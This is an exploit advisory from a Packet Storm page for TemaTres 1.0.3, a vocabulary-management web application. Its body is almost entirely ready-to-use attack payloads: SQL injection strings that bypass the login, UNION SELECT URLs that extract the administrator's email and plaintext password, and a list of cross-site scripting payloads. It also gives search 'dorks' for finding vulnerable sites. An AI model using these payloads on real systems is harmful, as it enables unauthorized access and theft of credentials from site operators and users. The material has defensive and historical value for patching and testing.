what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

TemaTres 1.0.3 SQL Injection / XSS

TemaTres 1.0.3 SQL Injection / XSS
Posted May 5, 2009
Authored by YEnH4ckEr

TemaTres version 1.0.3 suffers from authentication bypass, SQL injection, and cross site scripting vulnerabilities.

tags | exploit, vulnerability, xss, sql injection
SHA-256 | 000a02b57e57c10486f0f0a2c22f028e70d708ebec7fd79436ef113b4c202119

TemaTres 1.0.3 SQL Injection / XSS

Change Mirror Download

---------------------------------------------------
MULTIPLE REMOTE VULNERABILITIES--TemaTres 1.0.3-->
---------------------------------------------------

CMS INFORMATION:

-->WEB: http://www.r020.com.ar/tematres/
-->DOWNLOAD: http://sourceforge.net/projects/tematres/
-->DEMO: http://www.r020.com.ar/tematres/index.php
-->CATEGORY: CMS / Portals
-->DESCRIPTION: Web application to manage controlled vocabularies, taxonomies and thesaurus...

CMS VULNERABILITY:

-->TESTED ON: firefox 3
-->DORKs: "Powered by TemaTres" / "Generado por TemaTres" / "Criado por TemaTres"
-->CATEGORY: AUTH BYPASS/ SQL INJECTION/ XSS
-->AFFECT VERSION: LAST = 1.0.3 (maybe <= ?)
-->Discovered Bug date: 2009-04-23
-->Reported Bug date: 2009-04-23
-->Fixed bug date: 2009-05-04
-->Info patch (v1.0.31): http://www.r020.com.ar/tematres/tematres1.031.zip
-->Author: YEnH4ckEr
-->mail: y3nh4ck3r[at]gmail[dot]com
-->WEB/BLOG: N/A
-->COMMENT: A mi novia Marijose...hermano,cunyada, padres (y amigos xD) por su apoyo.
-->EXTRA-COMMENT: Gracias por aguantarme a todos! (Te kiero xikitiya!).


############
------------
CONDITIONS:
------------
############


**gpc_magic_quotes=off

**DBPREFIX='lc_' (Default)


####################
--------------------
AUTH BYPASS (SQLi):
--------------------
####################


mail:' or 1=1 /*
password: Nothing

Or...

mail: Something
password:' or 1=1 /*


######################
----------------------
SQL INJECTION (SQLi):
----------------------
######################


~~~~~~---->Unregistered user (get var --> 'letra'):

http://[HOST]/[HOME_PATH]/index.php?letra=2'+union+all+select+1,mail,3,pass+FROM+lc_usuario+WHERE+id=1/*

<------------ Got mail/pass of user id = 1 (admin) (pass no encrypted!) ------------>

~~~~~~---->Resgistered user (get vars --> 'y' and 'm'):

http://[HOST]/[HOME_PATH]/sobre.php?m=10&y=2007'+AND+0+UNION+ALL+SELECT+1,concat(mail,'<-:::->',pass),3,4,version(),concat(user(),'<-:::->',database()),7+FROM+lc_usuario+WHERE+id=1/*

http://[HOST]/[HOME_PATH]/sobre.php?m=10'+AND+0+UNION+ALL+SELECT+1,concat(mail,'<-:::->',pass),3,4,version(),concat(user(),'<-:::->',database()),7+FROM+lc_usuario+WHERE+id=1/*&y=2007

<------------ Got mail/pass of user id = 1 (admin) (pass no encrypted!) ------------>



############################
----------------------------
CROSS SITE SCRIPTING (XSS):
----------------------------
############################


There are a lot of links (This isn't entire list):


~~~------->Unregistered user


<----Search form---->

<script>while(1){alert('y3nh4ck3r was here!')}</script>


<----More links---->

http://[HOST]/[HOME_PATH]/index.php?_expresion_de_busqueda=<script>alert('y3nh4ck3r was here!')</script>&sgs=off

http://[HOST]/[HOME_PATH]/index.php?letra=D<script>alert('y3nh4ck3r was here!')</script>

http://[HOST]/[HOME_PATH]/index.php?estado_id=14"><script>alert('y3nh4ck3r was here!')</script>

http://[HOST]/[HOME_PATH]/index.php?tema="><script>alert('y3nh4ck3r was here!')</script>

http://[HOST]/[HOME_PATH]/index.php?tema=2&/trmino-subordinado-de-ejemplo"><script>alert('y3nh4ck3r was here!')</script>


~~~------->Registered user


<----Posting here---->

http://[HOST]/[HOME_PATH]/index.php?edit_id=12&tema=12

<script>alert('y3nh4ck3r was here!')</script>


<----More links---->

http://[HOST]/[HOME_PATH]/sobre.php?m=10&y=2007"><script>alert('y3nh4ck3r was here!')</script>

http://[HOST]/[HOME_PATH]/sobre.php?m=10&y=2007&ord=F"><script>alert('y3nh4ck3r was here!')</script>

http://[HOST]/[HOME_PATH]/sobre.php?m=10"><script>alert('y3nh4ck3r was here!')</script>&y=2007


#######################################################################
#######################################################################
##*******************************************************************##
## ESPECIAL GREETZ TO: Str0ke, JosS, Ulises2k ... ##
##*******************************************************************##
##-------------------------------------------------------------------##
##*******************************************************************##
## GREETZ TO: SPANISH H4ck3Rs community! ##
##*******************************************************************##
#######################################################################
#######################################################################
Login or Register to add favorites

File Archive:

July 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    27 Files
  • 2
    Jul 2nd
    10 Files
  • 3
    Jul 3rd
    35 Files
  • 4
    Jul 4th
    27 Files
  • 5
    Jul 5th
    18 Files
  • 6
    Jul 6th
    0 Files
  • 7
    Jul 7th
    0 Files
  • 8
    Jul 8th
    28 Files
  • 9
    Jul 9th
    44 Files
  • 10
    Jul 10th
    24 Files
  • 11
    Jul 11th
    25 Files
  • 12
    Jul 12th
    0 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    0 Files
  • 16
    Jul 16th
    0 Files
  • 17
    Jul 17th
    0 Files
  • 18
    Jul 18th
    0 Files
  • 19
    Jul 19th
    0 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close